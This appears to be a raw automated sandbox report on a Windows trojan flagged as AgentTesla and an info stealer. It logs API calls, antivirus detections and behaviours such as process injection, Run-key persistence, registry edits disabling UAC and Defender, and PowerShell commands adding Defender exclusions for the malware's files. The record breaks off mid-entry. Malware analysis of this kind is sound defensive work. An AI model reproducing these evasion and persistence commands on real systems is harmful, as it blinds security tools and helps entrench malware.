parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
flags: 1
oldfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\kxpiaqp2.newcfg
newfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
oldfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\kxpiaqp2.newcfg
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
flags: 1
oldfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\jzlgq1us.newcfg
newfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
oldfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\jzlgq1us.newcfg
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Run a KeyLogger rule KeyLogger
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
description Google Chrome User Data Check rule Chrome_User_Data_Check_Zero
description email clients info stealer rule infoStealer_emailClients_Zero
description browser info stealer rule infoStealer_browser_Zero
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
host 172.217.25.14
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000007ec
1 0 0

NtAllocateVirtualMemory

process_identifier: 5936
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000774
1 0 0

NtAllocateVirtualMemory

process_identifier: 8532
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000077c
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4 reg_value C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\javaupdate reg_value C:\Users\test22\AppData\Roaming\Install\Host.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{84R20A67-Q1HP-57Q4-5F1G-A71A01846283}\StubPath reg_value "C:\Users\test22\AppData\Roaming\Install\Host.exe"
file C:\Users\test22\AppData\Roaming\Install\Host.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

base_address: 0x0042a000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

base_address: 0x00436000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

base_address: 0x0042a000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

base_address: 0x00436000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

base_address: 0x0042a000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

base_address: 0x00436000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 8532
process_handle: 0x0000077c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0
FireEye Generic.mg.6640bb72348963f4
McAfee Artemis!6640BB723489
AegisLab Trojan.Multi.Generic.4!c
Sangfor Trojan.Win32.Save.a
Cyren W32/MSIL_Agent.BZW.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.ICX
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
Avast Win32:MalwareX-gen [Trj]
McAfee-GW-Edition Artemis!Trojan
Microsoft Trojan:Win32/Wacatac.B!ml
ViRobot Trojan.Win32.S.Agent.34600
ZoneAlarm UDS:DangerousObject.Multi.Generic
BitDefenderTheta Gen:NN.ZemsilCO.34758.cm1@amQgN6d
SentinelOne Static AI - Malicious PE
AVG Win32:MalwareX-gen [Trj]
Process injection Process 996 called NtSetContextThread to modify thread in remote process 2576
Process injection Process 3632 called NtSetContextThread to modify thread in remote process 5936
Process injection Process 6496 called NtSetContextThread to modify thread in remote process 8532
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000007f0
process_identifier: 2576
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000778
process_identifier: 5936
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000780
process_identifier: 8532
1 0 0
Process injection Process 996 resumed a thread in remote process 2576
Process injection Process 3632 resumed a thread in remote process 5936
Process injection Process 6496 resumed a thread in remote process 8532
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000007f0
suspend_count: 1
process_identifier: 2576
1 0 0

NtResumeThread

thread_handle: 0x00000778
suspend_count: 1
process_identifier: 5936
1 0 0

NtResumeThread

thread_handle: 0x00000780
suspend_count: 1
process_identifier: 8532
1 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Spynet
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\rstrui.exe
dead_host 95.90.186.169:3606
description attempts to disable user access control registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

thread_handle: 0x00000194
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

thread_handle: 0x00000590
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

thread_handle: 0x000005e0
suspend_count: 1
process_identifier: 996
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 996
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

thread_handle: 0x0000043c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 5096
thread_handle: 0x00000698
process_identifier: 7232
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath_r: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000069c
1 1 0

NtResumeThread

thread_handle: 0x00000680
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 8264
thread_handle: 0x000006d0
process_identifier: 7112
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000006e4
1 1 0

NtResumeThread

thread_handle: 0x000006ec
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 5272
thread_handle: 0x000006f8
process_identifier: 8300
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000718
1 1 0

NtResumeThread

thread_handle: 0x0000070c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 4780
thread_handle: 0x00000718
process_identifier: 2508
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000730
1 1 0

NtResumeThread

thread_handle: 0x00000724
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 5992
thread_handle: 0x00000728
process_identifier: 4376
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000748
1 1 0

NtResumeThread

thread_handle: 0x0000073c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 6324
thread_handle: 0x00000748
process_identifier: 4764
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000760
1 1 0

NtResumeThread

thread_handle: 0x00000754
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 7184
thread_handle: 0x00000750
process_identifier: 3632
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000774
1 1 0

NtResumeThread

thread_handle: 0x00000748
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 7804
thread_handle: 0x00000750
process_identifier: 8604
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000790
1 1 0

NtResumeThread

thread_handle: 0x00000784
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 9060
thread_handle: 0x0000078c
process_identifier: 7352
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007a8
1 1 0

NtResumeThread

thread_handle: 0x0000079c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 5264
